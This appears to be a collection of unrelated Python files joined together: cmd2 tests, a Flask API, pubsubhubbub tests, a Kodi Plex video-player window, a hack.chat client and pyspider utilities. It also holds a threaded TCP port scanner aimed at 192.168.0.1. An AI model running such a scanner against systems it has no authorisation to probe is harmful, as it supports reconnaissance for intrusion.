app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
class DisableCommandsApp(cmd2.Cmd):
"""Class for disabling commands"""
category_name = "Test Category"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@cmd2.with_category(category_name)
def do_has_helper_funcs(self, arg):
self.poutput("The real has_helper_funcs")
def help_has_helper_funcs(self):
self.poutput('Help for has_helper_funcs')
def complete_has_helper_funcs(self, *args):
return ['result']
@cmd2.with_category(category_name)
def do_has_no_helper_funcs(self, arg):
"""Help for has_no_helper_funcs"""
self.poutput("The real has_no_helper_funcs")
@pytest.fixture
def disable_commands_app():
app = DisableCommandsApp()
return app
def test_disable_and_enable_category(disable_commands_app):
##########################################################################
# Disable the category
##########################################################################
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_category(disable_commands_app.category_name, message_to_print)
# Make sure all the commands and help on those commands displays the message
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'help has_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'has_no_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'help has_no_helper_funcs')
assert err[0].startswith(message_to_print)
# Make sure neither function completes
text = ''
line = 'has_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
text = ''
line = 'has_no_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
# Make sure both commands are invisible
visible_commands = disable_commands_app.get_visible_commands()
assert 'has_helper_funcs' not in visible_commands
assert 'has_no_helper_funcs' not in visible_commands
# Make sure get_help_topics() filters out disabled commands
help_topics = disable_commands_app.get_help_topics()
assert 'has_helper_funcs' not in help_topics
##########################################################################
# Enable the category
##########################################################################
disable_commands_app.enable_category(disable_commands_app.category_name)
# Make sure all the commands and help on those commands are restored
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert out[0] == "The real has_helper_funcs"
out, err = run_cmd(disable_commands_app, 'help has_helper_funcs')
assert out[0] == "Help for has_helper_funcs"
out, err = run_cmd(disable_commands_app, 'has_no_helper_funcs')
assert out[0] == "The real has_no_helper_funcs"
out, err = run_cmd(disable_commands_app, 'help has_no_helper_funcs')
assert out[0] == "Help for has_no_helper_funcs"
# has_helper_funcs should complete now
text = ''
line = 'has_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is not None and disable_commands_app.completion_matches == ['result ']
# has_no_helper_funcs had no completer originally, so there should be no results
text = ''
line = 'has_no_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
# Make sure both commands are visible
visible_commands = disable_commands_app.get_visible_commands()
assert 'has_helper_funcs' in visible_commands
assert 'has_no_helper_funcs' in visible_commands
# Make sure get_help_topics() contains our help function
help_topics = disable_commands_app.get_help_topics()
assert 'has_helper_funcs' in help_topics
def test_enable_enabled_command(disable_commands_app):
# Test enabling a command that is not disabled
saved_len = len(disable_commands_app.disabled_commands)
disable_commands_app.enable_command('has_helper_funcs')
# The number of disabled_commands should not have changed
assert saved_len == len(disable_commands_app.disabled_commands)
def test_disable_fake_command(disable_commands_app):
with pytest.raises(AttributeError):
disable_commands_app.disable_command('fake', 'fake message')
def test_disable_command_twice(disable_commands_app):
saved_len = len(disable_commands_app.disabled_commands)
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
# The length of disabled_commands should have increased one
new_len = len(disable_commands_app.disabled_commands)
assert saved_len == new_len - 1
saved_len = new_len
# Disable again and the length should not change
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
new_len = len(disable_commands_app.disabled_commands)
assert saved_len == new_len
def test_disabled_command_not_in_history(disable_commands_app):
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
saved_len = len(disable_commands_app.history)
run_cmd(disable_commands_app, 'has_helper_funcs')
assert saved_len == len(disable_commands_app.history)
def test_disabled_message_command_name(disable_commands_app):
message_to_print = '{} is currently disabled'.format(COMMAND_NAME)
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert err[0].startswith('has_helper_funcs is currently disabled')
def test_startup_script(request):
test_dir = os.path.dirname(request.module.__file__)
startup_script = os.path.join(test_dir, '.cmd2rc')
app = cmd2.Cmd(allow_cli_args=False, startup_script=startup_script)
assert len(app._startup_commands) == 1
assert app._startup_commands[0] == "run_script {}".format(utils.quote_string(startup_script))
app._startup_commands.append('quit')
app.cmdloop()
out, err = run_cmd(app, 'alias list')
assert len(out) > 1
assert 'alias create ls' in out[0]
@pytest.mark.parametrize('startup_script', odd_file_names)
def test_startup_script_with_odd_file_names(startup_script):
"""Test file names with various patterns"""
# Mock os.path.exists to trick cmd2 into adding this script to its startup commands
saved_exists = os.path.exists
os.path.exists = mock.MagicMock(name='exists', return_value=True)
app = cmd2.Cmd(allow_cli_args=False, startup_script=startup_script)
assert len(app._startup_commands) == 1
assert app._startup_commands[0] == "run_script {}".format(utils.quote_string(os.path.abspath(startup_script)))
# Restore os.path.exists
os.path.exists = saved_exists
def test_transcripts_at_init():
transcript_files = ['foo', 'bar']
app = cmd2.Cmd(allow_cli_args=False, transcript_files=transcript_files)
assert app._transcript_files == transcript_files
|
__init__.py
|
from flask import Flask, request, jsonify
from flask_cors import CORS
from migration import Migrate, Aggregate
import subprocess
import os
import threading
app = Flask(__name__)
CORS(app)
HOSTNAME = '127.0.0.1'
PORT = 1338
@app.route('/data', methods=['GET'])
def data():
timespan = request.args.get('timespan')
data = Migrate(timespan)
return jsonify(data)
@app.route('/search', methods=['GET'])
def search():
list_len = request.args.get('list')
timespan = request.args.get('timespan')
data = Aggregate(int(list_len), timespan)
return jsonify(data)
def start_scheduler():
print('[INFO] Starting scheduler')
cwd = os.getcwd()
subprocess.run([f'{cwd}/venv/bin/python3', f'{cwd}/scheduler.py'])
scheduler_thread = threading.Thread(target=start_scheduler)
scheduler_thread.start()
if __name__ == '__main__':
app.run(host=HOSTNAME, port=PORT)
|
pubsubhubbub_publish_test.py
|
#!/usr/bin/env python
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for the pubsubhubbub_publish module."""
__author__ = 'bslatkin@gmail.com (Brett Slatkin)'
import BaseHTTPServer
import urllib
import unittest
import threading
import pubsubhubbub_publish
REQUESTS = 0
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
global REQUESTS
print 'Accessed', self.path
REQUESTS += 1
length = int(self.headers.get('content-length', 0))
if not length:
return self.send_error(500)
body = self.rfile.read(length)
if self.path == '/single':
if body != urllib.urlencode(
{'hub.url': 'http://example.com/feed', 'hub.mode': 'publish'}):
self.send_error(500)
self.wfile.write('Bad body. Found:')
self.wfile.write(body)
else:
self.send_response(204)
elif self.path == '/multiple':
if body != urllib.urlencode(
{'hub.url': ['http://example.com/feed',
'http://example.com/feed2',
'http://example.com/feed3'],
'hub.mode': 'publish'}, doseq=True):
self.send_error(500)
self.wfile.write('Bad body. Found:')
self.wfile.write(body)
else:
self.send_response(204)
elif self.path == '/batch':
self.send_response(204)
elif self.path == '/fail':
self.send_error(400)
self.wfile.write('bad argument')
else:
self.send_error(404)
class PublishTest(unittest.TestCase):
def setUp(self):
global REQUESTS
REQUESTS = 0
self.server = BaseHTTPServer.HTTPServer(('', 0), RequestHandler)
t = threading.Thread(target=self.server.serve_forever)
t.setDaemon(True)
t.start()
self.hub = 'http://%s:%d' % (
self.server.server_name, self.server.server_port)
self.feed = 'http://example.com/feed'
self.feed2 = 'http://example.com/feed2'
self.feed3 = 'http://example.com/feed3'
def testSingle(self):
pubsubhubbub_publish.publish(self.hub + '/single', self.feed)
self.assertEquals(1, REQUESTS)
def testMultiple(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
self.feed, self.feed2, self.feed3)
def testList(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
[self.feed, self.feed2, self.feed3])
def testIterable(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
iter([self.feed, self.feed2, self.feed3]))
def testBatchSizeLimit(self):
old = pubsubhubbub_publish.URL_BATCH_SIZE
try:
pubsubhubbub_publish.URL_BATCH_SIZE = 2
pubsubhubbub_publish.publish(self.hub + '/batch',
[self.feed, self.feed2, self.feed3])
finally:
pubsubhubbub_publish.URL_BATCH_SIZE = old
self.assertEquals(2, REQUESTS)
def testBadHubHostname(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
'http://asdf.does.not.resolve', self.feed)
def testBadArgument(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
self.hub + '/fail', self.feed)
def testBadHubUrl(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
'not://a.url.is.this', self.feed)
def testNotFound(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
self.hub + '/unknown', self.feed)
if __name__ == '__main__':
unittest.main()
|
videoplayer.py
|
from __future__ import absolute_import
import time
import threading
from kodi_six import xbmc
from kodi_six import xbmcgui
from . import kodigui
from . import windowutils
from . import opener
from . import busy
from . import search
from . import dropdown
from lib import util
from lib import player
from lib import colors
from lib.util import T
PASSOUT_PROTECTION_DURATION_SECONDS = 7200
PASSOUT_LAST_VIDEO_DURATION_MILLIS = 1200000
class VideoPlayerWindow(kodigui.ControlledWindow, windowutils.UtilMixin):
xmlFile = 'script-plex-video_player.xml'
path = util.ADDON.getAddonInfo('path')
theme = 'Main'
res = '1080i'
width = 1920
height = 1080
NEXT_DIM = (537, 303)
PREV_DIM = (462, 259)
ONDECK_DIM = (329, 185)
RELATED_DIM = (268, 397)
ROLES_DIM = (268, 268)
OPTIONS_GROUP_ID = 200
PREV_BUTTON_ID = 101
NEXT_BUTTON_ID = 102
ONDECK_LIST_ID = 400
RELATED_LIST_ID = 401
ROLES_LIST_ID = 403
HOME_BUTTON_ID = 201
SEARCH_BUTTON_ID = 202
PLAYER_STATUS_BUTTON_ID = 204
def __init__(self, *args, **kwargs):
kodigui.ControlledWindow.__init__(self, *args, **kwargs)
windowutils.UtilMixin.__init__(self)
self.playQueue = kwargs.get('play_queue')
self.video = kwargs.get('video')
self.resume = bool(kwargs.get('resume'))
self.postPlayMode = False
self.prev = None
self.playlist = None
self.handler = None
self.next = None
self.videos = None
self.trailer = None
self.aborted = True
self.timeout = None
self.passoutProtection = 0
self.lastFocusID = None
self.lastNonOptionsFocusID = None
def doClose(self):
util.DEBUG_LOG('VideoPlayerWindow: Closing')
self.timeout = None
kodigui.ControlledWindow.doClose(self)
player.PLAYER.handler.sessionEnded()
def onFirstInit(self):
player.PLAYER.on('session.ended', self.sessionEnded)
player.PLAYER.on('post.play', self.postPlay)
player.PLAYER.on('change.background', self.changeBackground)
self.onDeckListControl = kodigui.ManagedControlList(self, self.ONDECK_LIST_ID, 5)
self.relatedListControl = kodigui.ManagedControlList(self, self.RELATED_LIST_ID, 5)
self.rolesListControl = kodigui.ManagedControlList(self, self.ROLES_LIST_ID, 5)
util.DEBUG_LOG('VideoPlayerWindow: Starting session (ID: {0})'.format(id(self)))
self.resetPassoutProtection()
self.play(resume=self.resume)
def onReInit(self):
self.setBackground()
def onAction(self, action):
try:
if self.postPlayMode:
self.cancelTimer()
self.resetPassoutProtection()
if action in(xbmcgui.ACTION_NAV_BACK, xbmcgui.ACTION_CONTEXT_MENU):
if not xbmc.getCondVisibility('ControlGroup({0}).HasFocus(0)'.format(self.OPTIONS_GROUP_ID)):
if not util.advancedSettings.fastBack or action == xbmcgui.ACTION_CONTEXT_MENU:
self.lastNonOptionsFocusID = self.lastFocusID
self.setFocusId(self.OPTIONS_GROUP_ID)
return
else:
if self.lastNonOptionsFocusID and action == xbmcgui.ACTION_CONTEXT_MENU:
self.setFocusId(self.lastNonOptionsFocusID)
self.lastNonOptionsFocusID = None
return
if action in(xbmcgui.ACTION_NAV_BACK, xbmcgui.ACTION_PREVIOUS_MENU):
self.doClose()
return
if action in (xbmcgui.ACTION_NEXT_ITEM, xbmcgui.ACTION_PLAYER_PLAY):
self.playVideo()
elif action == xbmcgui.ACTION_PREV_ITEM:
self.playVideo(prev=True)
elif action == xbmcgui.ACTION_STOP:
self.doClose()
except:
util.ERROR()
kodigui.ControlledWindow.onAction(self, action)
def onClick(self, controlID):
if not self.postPlayMode:
return
self.cancelTimer()
if controlID == self.HOME_BUTTON_ID:
self.goHome()
elif controlID == self.ONDECK_LIST_ID:
self.openItem(self.onDeckListControl)
elif controlID == self.RELATED_LIST_ID:
self.openItem(self.relatedListControl)
elif controlID == self.ROLES_LIST_ID:
self.roleClicked()
elif controlID == self.PREV_BUTTON_ID:
self.playVideo(prev=True)
elif controlID == self.NEXT_BUTTON_ID:
self.playVideo()
elif controlID == self.PLAYER_STATUS_BUTTON_ID:
self.showAudioPlayer()
elif controlID == self.SEARCH_BUTTON_ID:
self.searchButtonClicked()
def onFocus(self, controlID):
if not self.postPlayMode:
return
self.lastFocusID = controlID
if 399 < controlID < 500:
self.setProperty('hub.focus', str(controlID - 400))
else:
self.setProperty('hub.focus', '')
if xbmc.getCondVisibility('Control.HasFocus(101) | Control.HasFocus(102) | ControlGroup(200).HasFocus(0)'):
self.setProperty('on.extras', '')
elif xbmc.getCondVisibility('ControlGroup(60).HasFocus(0)'):
self.setProperty('on.extras', '1')
def searchButtonClicked(self):
self.processCommand(search.dialog(self, section_id=self.prev.getLibrarySectionId() or None))
def roleClicked(self):
mli = self.rolesListControl.getSelectedItem()
if not mli:
return
sectionRoles = busy.widthDialog(mli.dataSource.sectionRoles, '')
if not sectionRoles:
util.DEBUG_LOG('No sections found for actor')
return
if len(sectionRoles) > 1:
x, y = self.getRoleItemDDPosition()
options = [{'role': r, 'display': r.reasonTitle} for r in sectionRoles]
choice = dropdown.showDropdown(options, (x, y), pos_is_bottom=True, close_direction='bottom')
if not choice:
return
role = choice['role']
else:
role = sectionRoles[0]
self.processCommand(opener.open(role))
def getRoleItemDDPosition(self):
y = 1000
if xbmc.getCondVisibility('Control.IsVisible(500)'):
y += 360
if xbmc.getCondVisibility('Control.IsVisible(501)'):
y += 520
if xbmc.getCondVisibility('!String.IsEmpty(Window.Property(on.extras))'):
y -= 300
if xbmc.getCondVisibility('Integer.IsGreater(Window.Property(hub.focus),0) + Control.IsVisible(500)'):
y -= 500
if xbmc.getCondVisibility('Integer.IsGreater(Window.Property(hub.focus),1) + Control.IsVisible(501)'):
y -= 500
focus = int(xbmc.getInfoLabel('Container(403).Position'))
x = ((focus + 1) * 304) - 100
return x, y
def setBackground(self):
video = self.video if self.video else self.playQueue.current()
self.setProperty('background', video.defaultArt.asTranscodedImageURL(1920, 1080, opacity=60, background=colors.noAlpha.Background))
def changeBackground(self, url, **kwargs):
self.setProperty('background', url)
def sessionEnded(self, session_id=None, **kwargs):
if session_id != id(self):
util.DEBUG_LOG('VideoPlayerWindow: Ignoring session end (ID: {0} - SessionID: {1})'.format(id(self), session_id))
return
util.DEBUG_LOG('VideoPlayerWindow: Session ended - closing (ID: {0})'.format(id(self)))
self.doClose()
def play(self, resume=False, handler=None):
self.hidePostPlay()
self.setBackground()
if self.playQueue:
player.PLAYER.playVideoPlaylist(self.playQueue, resume=self.resume, session_id=id(self), handler=handler)
elif self.video:
player.PLAYER.playVideo(self.video, resume=self.resume, force_update=True, session_id=id(self), handler=handler)
def openItem(self, control=None, item=None):
if not item:
mli = control.getSelectedItem()
if not mli:
return
item = mli.dataSource
self.processCommand(opener.open(item))
def showPostPlay(self):
self.postPlayMode = True
self.setProperty('post.play', '1')
def hidePostPlay(self):
self.postPlayMode = False
self.setProperty('post.play', '')
self.setProperties((
'post.play.background',
'info.title',
'info.duration',
'info.summary',
'info.date',
'next.thumb',
'next.title',
'next.subtitle',
'prev.thumb',
'prev.title',
'prev.subtitle',
'related.header',
'has.next'
), '')
self.onDeckListControl.reset()
self.relatedListControl.reset()
self.rolesListControl.reset()
@busy.dialog()
def postPlay(self, video=None, playlist=None, handler=None, **kwargs):
util.DEBUG_LOG('VideoPlayer: Starting post-play')
self.showPostPlay()
self.prev = video
self.playlist = playlist
self.handler = handler
self.getHubs()
self.setProperty(
'thumb.fallback', 'script.plex/thumb_fallbacks/{0}.png'.format(self.prev.type in ('show', 'season', 'episode') and 'show' or 'movie')
)
util.DEBUG_LOG('PostPlay: Showing video info')
if self.next:
self.next.reload(includeRelated=1, includeRelatedCount=10, includeExtras=1, includeExtrasCount=10)
self.setInfo()
self.fillOnDeck()
hasPrev = self.fillRelated()
self.fillRoles(hasPrev)
self.startTimer()
if self.next:
self.setFocusId(self.NEXT_BUTTON_ID)
else:
self.setFocusId(self.PREV_BUTTON_ID)
def resetPassoutProtection(self):
self.passoutProtection = time.time() + PASSOUT_PROTECTION_DURATION_SECONDS
def startTimer(self):
if not util.getSetting('post_play_auto', True):
util.DEBUG_LOG('Post play auto-play disabled')
return
if not self.next:
return
if time.time() > self.passoutProtection and self.prev.duration.asInt() > PASSOUT_LAST_VIDEO_DURATION_MILLIS:
util.DEBUG_LOG('Post play auto-play skipped: Passout protection')
return
else:
millis = (self.passoutProtection - time.time()) * 1000
util.DEBUG_LOG('Post play auto-play: Passout protection in {0}'.format(util.durationToShortText(millis)))
util.DEBUG_LOG('Staring post-play timer')
self.timeout = time.time() + 16
threading.Thread(target=self.countdown).start()
def cancelTimer(self):
if self.timeout is not None:
util.DEBUG_LOG('Canceling post-play timer')
self.timeout = None
self.setProperty('countdown', '')
def countdown(self):
while self.timeout and not util.MONITOR.waitForAbort(0.1):
now = time.time()
if self.timeout and now > self.timeout:
self.timeout = None
self.setProperty('countdown', '')
util.DEBUG_LOG('Post-play timer finished')
# This works. The direct method caused the OSD to be broken, possibly because it was triggered from another thread?
# That was the only real difference I could see between the direct method and the user actually clicking the button.
xbmc.executebuiltin('SendClick(,{0})'.format(self.NEXT_BUTTON_ID))
# Direct method, causes issues with OSD
# self.playVideo()
break
elif self.timeout is not None:
self.setProperty('countdown', str(min(15, int((self.timeout or now) - now))))
def getHubs(self):
try:
self.hubs = self.prev.postPlay()
except:
util.ERROR()
self.next = None
if self.playlist:
if self.prev != self.playlist.current():
self.next = self.playlist.current()
else:
if self.prev.type == 'episode' and 'tv.upnext' in self.hubs:
self.next = self.hubs['tv.upnext'].items[-1]
if self.next:
self.setProperty('has.next', '1')
def setInfo(self):
if self.next:
self.setProperty(
'post.play.background',
self.next.art.asTranscodedImageURL(self.width, self.height, blur=128, opacity=60, background=colors.noAlpha.Background)
)
self.setProperty('info.title', self.next.title)
self.setProperty('info.duration', util.durationToText(self.next.duration.asInt()))
self.setProperty('info.summary', self.next.summary)
if self.prev:
self.setProperty(
'post.play.background',
self.prev.art.asTranscodedImageURL(self.width, self.height, blur=128, opacity=60, background=colors.noAlpha.Background)
)
self.setProperty('prev.info.title', self.prev.title)
self.setProperty('prev.info.duration', util.durationToText(self.prev.duration.asInt()))
self.setProperty('prev.info.summary', self.prev.summary)
if self.prev.type == 'episode':
self.setProperty('related.header', T(32306, 'Related Shows'))
if self.next:
self.setProperty('next.thumb', self.next.thumb.asTranscodedImageURL(*self.NEXT_DIM))
self.setProperty('info.date', util.cleanLeadingZeros(self.next.originallyAvailableAt.asDatetime('%B %d, %Y')))
self.setProperty('next.title', self.next.grandparentTitle)
self.setProperty(
'next.subtitle', u'{0} {1} \u2022 {2} {3}'.format(T(32303, 'Season'), self.next.parentIndex, T(32304, 'Episode'), self.next.index)
)
if self.prev:
self.setProperty('prev.thumb', self.prev.thumb.asTranscodedImageURL(*self.PREV_DIM))
self.setProperty('prev.title', self.prev.grandparentTitle)
self.setProperty(
'prev.subtitle', u'{0} {1} \u2022 {2} {3}'.format(T(32303, 'Season'), self.prev.parentIndex, T(32304, 'Episode'), self.prev.index)
)
self.setProperty('prev.info.date', util.cleanLeadingZeros(self.prev.originallyAvailableAt.asDatetime('%B %d, %Y')))
elif self.prev.type == 'movie':
self.setProperty('related.header', T(32404, 'Related Movies'))
if self.next:
self.setProperty('next.thumb', self.next.defaultArt.asTranscodedImageURL(*self.NEXT_DIM))
self.setProperty('info.date', self.next.year)
self.setProperty('next.title', self.next.title)
self.setProperty('next.subtitle', self.next.year)
if self.prev:
self.setProperty('prev.thumb', self.prev.defaultArt.asTranscodedImageURL(*self.PREV_DIM))
self.setProperty('prev.title', self.prev.title)
self.setProperty('prev.subtitle', self.prev.year)
self.setProperty('prev.info.date', self.prev.year)
def fillOnDeck(self):
items = []
idx = 0
onDeckHub = self.hubs.get('tv.ondeck', self.hubs.get('movie.similar'))
if not onDeckHub:
self.onDeckListControl.reset()
return False
for ondeck in onDeckHub.items:
title = ondeck.grandparentTitle or ondeck.title
if ondeck.type == 'episode':
thumb = ondeck.thumb.asTranscodedImageURL(*self.ONDECK_DIM)
else:
thumb = ondeck.defaultArt.asTranscodedImageURL(*self.ONDECK_DIM)
mli = kodigui.ManagedListItem(title or '', thumbnailImage=thumb, data_source=ondeck)
if mli:
mli.setProperty('index', str(idx))
mli.setProperty('progress', util.getProgressImage(mli.dataSource))
mli.setProperty(
'thumb.fallback', 'script.plex/thumb_fallbacks/{0}.png'.format(ondeck.type in ('show', 'season', 'episode') and 'show' or 'movie')
)
if ondeck.type in 'episode':
mli.setLabel2(u'{0}{1} \u2022 {2}{3}'.format(T(32310, 'S'), ondeck.parentIndex, T(32311, 'E'), ondeck.index))
else:
mli.setLabel2(ondeck.year)
items.append(mli)
idx += 1
if not items:
return False
self.onDeckListControl.reset()
self.onDeckListControl.addItems(items)
return True
def fillRelated(self, has_prev=False):
items = []
idx = 0
video = self.next if self.next else self.prev
if not video.related:
self.relatedListControl.reset()
return False
for rel in video.related()[0].items:
mli = kodigui.ManagedListItem(rel.title or '', thumbnailImage=rel.thumb.asTranscodedImageURL(*self.RELATED_DIM), data_source=rel)
if mli:
mli.setProperty('thumb.fallback', 'script.plex/thumb_fallbacks/{0}.png'.format(rel.type in ('show', 'season', 'episode') and 'show' or 'movie'))
mli.setProperty('index', str(idx))
if self.prev and self.prev.type == 'episode':
if not mli.dataSource.isWatched:
mli.setProperty('unwatched.count', str(mli.dataSource.unViewedLeafCount))
else:
mli.setProperty('unwatched', not mli.dataSource.isWatched and '1' or '')
mli.setProperty('progress', util.getProgressImage(mli.dataSource))
items.append(mli)
idx += 1
if not items:
return False
self.setProperty('divider.{0}'.format(self.RELATED_LIST_ID), has_prev and '1' or '')
self.relatedListControl.reset()
self.relatedListControl.addItems(items)
return True
def fillRoles(self, has_prev=False):
items = []
idx = 0
video = self.next if self.next else self.prev
if not video.roles:
self.rolesListControl.reset()
return False
for role in video.roles():
mli = kodigui.ManagedListItem(role.tag, role.role, thumbnailImage=role.thumb.asTranscodedImageURL(*self.ROLES_DIM), data_source=role)
mli.setProperty('index', str(idx))
items.append(mli)
idx += 1
if not items:
return False
self.setProperty('divider.{0}'.format(self.ROLES_LIST_ID), has_prev and '1' or '')
self.rolesListControl.reset()
self.rolesListControl.addItems(items)
return True
def playVideo(self, prev=False):
self.cancelTimer()
try:
if not self.next and self.playlist:
if prev:
self.playlist.prev()
self.aborted = False
self.playQueue = self.playlist
self.video = None
self.play(handler=self.handler)
else:
video = self.next
if prev:
video = self.prev
if not video:
util.DEBUG_LOG('Trying to play next video with no next video available')
self.video = None
return
self.playQueue = None
self.video = video
self.play(handler=self.handler)
except:
util.ERROR()
def play(video=None, play_queue=None, resume=False):
w = VideoPlayerWindow.open(video=video, play_queue=play_queue, resume=resume)
player.PLAYER.reset()
player.PLAYER.off('session.ended', w.sessionEnded)
player.PLAYER.off('post.play', w.postPlay)
player.PLAYER.off('change.background', w.changeBackground)
command = w.exitCommand
del w
util.garbageCollect()
return command
|
hackchat.py
|
import json
import threading
import time
import websocket
class HackChat:
"""A library to connect to https://hack.chat.
<on_message> is <list> of callback functions to receive data from
https://hack.chat. Add your callback functions to this attribute.
e.g., on_message += [my_callback]
The callback function should have 3 parameters, the first for the
<HackChat> object, the second for the message someone sent and the
third for the nickname of the sender of the message.
"""
def __init__(self, nick, channel="programming"):
"""Connects to a channel on https://hack.chat.
Keyword arguments:
nick -- <str>; the nickname to use upon joining the channel
channel -- <str>; the channel to connect to on https://hack.chat
"""
self.nick = nick
self.channel = channel
self.online_users = []
self.on_message = []
self.on_join = []
self.on_leave = []
self.ws = websocket.create_connection("wss://hack.chat/chat-ws")
self._send_packet({"cmd": "join", "channel": channel, "nick": nick})
threading.Thread(target = self._ping_thread).start()
def send_message(self, msg):
"""Sends a message on the channel."""
self._send_packet({"cmd": "chat", "text": msg})
def _send_packet(self, packet):
"""Sends <packet> (<dict>) to https://hack.chat."""
encoded = json.dumps(packet)
self.ws.send(encoded)
def run(self):
"""Sends data to the callback functions."""
while True:
result = json.loads(self.ws.recv())
if result["cmd"] == "chat" and not result["nick"] == self.nick:
for handler in list(self.on_message):
handler(self, result["text"], result["nick"])
elif result["cmd"] == "onlineAdd":
self.online_users.append(result["nick"])
for handler in list(self.on_join):
handler(self, result["nick"])
elif result["cmd"] == "onlineRemove":
self.online_users.remove(result["nick"])
for handler in list(self.on_leave):
handler(self, result["nick"])
elif result["cmd"] == "onlineSet":
for nick in result["nicks"]:
self.online_users.append(nick)
def _ping_thread(self):
"""Retains the websocket connection."""
while self.ws.connected:
self._send_packet({"cmd": "ping"})
time.sleep(60)
|
port scanner.py
|
from queue import Queue
import socket
import threading
target = "192.168.0.1"
queue = Queue()
open_ports = []
def portscan(port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
return True
except:
return False
def get_ports(mode):
if mode == 1:
for port in range(1, 1024):
queue.put(port)
elif mode == 2:
for port in range(1, 49152):
queue.put(port)
elif mode == 3:
ports = [20, 21, 22, 23, 25, 53, 80, 110, 443]
for port in ports:
queue.put(port)
elif mode == 4:
ports = input("Enter your ports (seperate by blank):")
ports = ports.split()
ports = list(map(int, ports))
for port in ports:
queue.put(port)
def worker():
while not queue.empty():
port = queue.get()
if portscan(port):
print("Port {} is open!".format(port))
open_ports.append(port)
def run_scanner(threads, mode):
get_ports(mode)
thread_list = []
for t in range(threads):
thread = threading.Thread(target=worker)
thread_list.append(thread)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
print("Open ports are:", open_ports)
run_scanner(100, 1)
input()
|
utils.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2012-11-06 11:50:13
import logging
import hashlib
import datetime
import base64
import six
from six import iteritems
md5string = lambda x: hashlib.md5(utf8(x)).hexdigest()
class ReadOnlyDict(dict):
"""A Read Only Dict"""
def __setitem__(self, key, value):
raise Exception("dict is read-only")
def getitem(obj, key=0, default=None):
"""Get first element of list or return default"""
try:
return obj[key]
except:
return default
def hide_me(tb, g=globals()):
"""Hide stack traceback of given stack"""
base_tb = tb
try:
while tb and tb.tb_frame.f_globals is not g:
tb = tb.tb_next
while tb and tb.tb_frame.f_globals is g:
tb = tb.tb_next
except Exception as e:
logging.exception(e)
tb = base_tb
if not tb:
tb = base_tb
return tb
def run_in_thread(func, *args, **kwargs):
"""Run function in thread, return a Thread object"""
from threading import Thread
thread = Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def run_in_subprocess(func, *args, **kwargs):
"""Run function in subprocess, return a Process object"""
from multiprocessing import Process
thread = Process(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def format_date(date, gmt_offset=0, relative=True, shorter=False, full_format=False):
"""Formats the given date (which should be GMT).
By default, we return a relative time (e.g., "2 minutes ago"). You
can return an absolute date string with ``relative=False``.
You can force a full format date ("July 10, 1980") with
``full_format=True``.
This method is primarily intended for dates in the past.
For dates in the future, we fall back to full format.
From tornado
"""
if not date:
return '-'
if isinstance(date, float) or isinstance(date, int):
date = datetime.datetime.utcfromtimestamp(date)
now = datetime.datetime.utcnow()
if date > now:
if relative and (date - now).seconds < 60:
# Due to click skew, things are some things slightly
# in the future. Round timestamps in the immediate
# future down to now in relative mode.
date = now
else:
# Otherwise, future dates always use the full format.
full_format = True
local_date = date - datetime.timedelta(minutes=gmt_offset)
local_now = now - datetime.timedelta(minutes=gmt_offset)
local_yesterday = local_now - datetime.timedelta(hours=24)
difference = now - date
seconds = difference.seconds
days = difference.days
format = None
if not full_format:
if relative and days == 0:
if seconds < 50:
return ("1 second ago" if seconds <= 1 else
"%(seconds)d seconds ago") % {"seconds": seconds}
if seconds < 50 * 60:
minutes = round(seconds / 60.0)
return ("1 minute ago" if minutes <= 1 else
"%(minutes)d minutes ago") % {"minutes": minutes}
hours = round(seconds / (60.0 * 60))
return ("1 hour ago" if hours <= 1 else
"%(hours)d hours ago") % {"hours": hours}
if days == 0:
format = "%(time)s"
elif days == 1 and local_date.day == local_yesterday.day and \
relative:
